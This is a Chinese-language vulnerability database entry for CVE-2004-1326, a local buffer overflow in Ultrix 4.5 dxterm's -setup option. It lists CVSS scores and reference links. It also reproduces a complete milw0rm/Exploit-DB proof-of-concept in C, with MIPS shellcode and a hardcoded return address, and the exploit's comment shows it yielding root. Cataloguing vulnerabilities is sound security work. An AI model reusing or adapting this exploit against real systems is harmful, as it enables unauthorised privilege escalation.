CVE-2004-1326
CVSS7.2
发布时间 :2004-12-20 00:00:00
修订时间 :2016-10-17 22:53:12
NMCOE    

[原文]Buffer overflow in dxterm in Ultrix 4.5 allows local users to execute arbitrary code via a long -setup parameter.


[CNNVD]Ultrix DXTerm设置参数 本地缓冲区溢出漏洞(CNNVD-200412-079)

        Ultrix 4.5版本的dxterm存在缓冲区溢出漏洞。本地用户借助超长的-setup参数执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1326
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1326
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-079
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=110356470029424&w=2
(UNKNOWN)  BUGTRAQ  20041219 Exploit for Ultrix 4.5 dxterm
http://www.frsirt.com/exploits/20041220.ultrix_dxterm_4.5_exploit.c.php
(VENDOR_ADVISORY)  MISC  http://www.frsirt.com/exploits/20041220.ultrix_dxterm_4.5_exploit.c.php
http://www.securityfocus.com/bid/12049
(VENDOR_ADVISORY)  BID  12049
http://xforce.iss.net/xforce/xfdb/18613
(VENDOR_ADVISORY)  XF  ultrix-dxterm-bo(18613)

- 漏洞信息

Ultrix DXTerm设置参数 本地缓冲区溢出漏洞
高危 缓冲区溢出
2004-12-20 00:00:00 2005-10-20 00:00:00
本地  
        Ultrix 4.5版本的dxterm存在缓冲区溢出漏洞。本地用户借助超长的-setup参数执行任意代码。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (698)

Ultrix 4.5/MIPS dxterm Local Buffer Overflow Exploit (EDBID:698)
ultrix local
2004-12-20 Verified
0 Kristoffer Brånemyr
N/A [点击下载]
/* Ultrix 4.5/MIPS dxterm exploit
  by ztion in 2004
  Greets to: Stok, sidez

  It wasn't possible to use '/' in the shellcode. Probably dxterm only
  copies everything after the last slash, as it expects a path.
  Since everything is pretty much hardcoded, you will probably have to
  tweak it for versions other than 4.5

  nora> ./ultrix_dxterm_4.5_exploit
  $ id
  uid=268(ztion) gid=15(users)euid=0(root)
*/

#include <stdio.h>

#define NOP 0x25f8e003
#define RET 0x7fffbe90

char shellcode[] = {
       0x69,0x6e,0x19,0x3c,    /* lui   $t9, 0x6e69 */
       0x2e,0x61,0x39,0x37,    /* ori   $t9, $t9, 0x612e */
       0x38,0x01,0xb6,0x23,    /* addi  $s6, $sp, 312 */
       0x01,0x01,0x39,0x23,    /* addi  $t9, $t9, 0x0101 */
       0xf0,0xfe,0xd9,0xae,    /* sw    $t9, -272($s6) */
       0x73,0x68,0x19,0x3c,    /* lui   $t9, 0x6873 */
       0x11,0x11,0x06,0x24,    /* li    $a2, 0x1111 */
       0x11,0x11,0xc6,0x38,    /* xori  $a2, $a2, 0x1111 */
       0x2e,0x2e,0x39,0x37,    /* ori   $t9, $t9, 0x2e2e */
       0xf0,0xfe,0xc4,0x26,    /* addiu $a0, $s6, -272 */
       0x01,0x01,0x39,0x23,    /* addi  $t9, $t9, 0x0101 */
       0x3f,0x01,0x02,0x24,    /* li    $v0, 319 */
       0xfc,0xfe,0x42,0x20,    /* addi  $v0, $v0, -260 */
       0xf4,0xfe,0xd9,0xae,    /* sw    $t9, -268($s6) */
       0xe8,0xfe,0xc4,0xae,    /* sw    $a0, -280($s6) */
       0xf8,0xfe,0xc6,0xae,    /* sw    $a2, -264($s6) */
       0xec,0xfe,0xc6,0xae,    /* sw    $a2, -276($s6) */
       0xe8,0xfe,0xc5,0x26,    /* addiu $a1, $s6, -280 */
       0xcc,0xff,0xff,0x01     /* syscall */

};

int main(void)
{
       char buf[256];
       int i;

       memset (buf, 2, 255);
       i = 0;
       while (i <= 8) {
               ((int *)(buf+1))[i] = NOP;
               i++;
       }

       memcpy (buf+33, shellcode, sizeof(shellcode));

       ((int *)(buf+3))[29] = RET;
       /* 119 - 122 is the return address */
       buf[123] = '\0';

       execl ("/usr/bin/dxterm", "dxterm", "-display", "localhost:0", "-setup", buf, NULL);
}

// milw0rm.com [2004-12-20]
		

- 漏洞信息

12626
Ultrix dxterm -setup Option Local Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-12-19 Unknow
2004-12-19 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站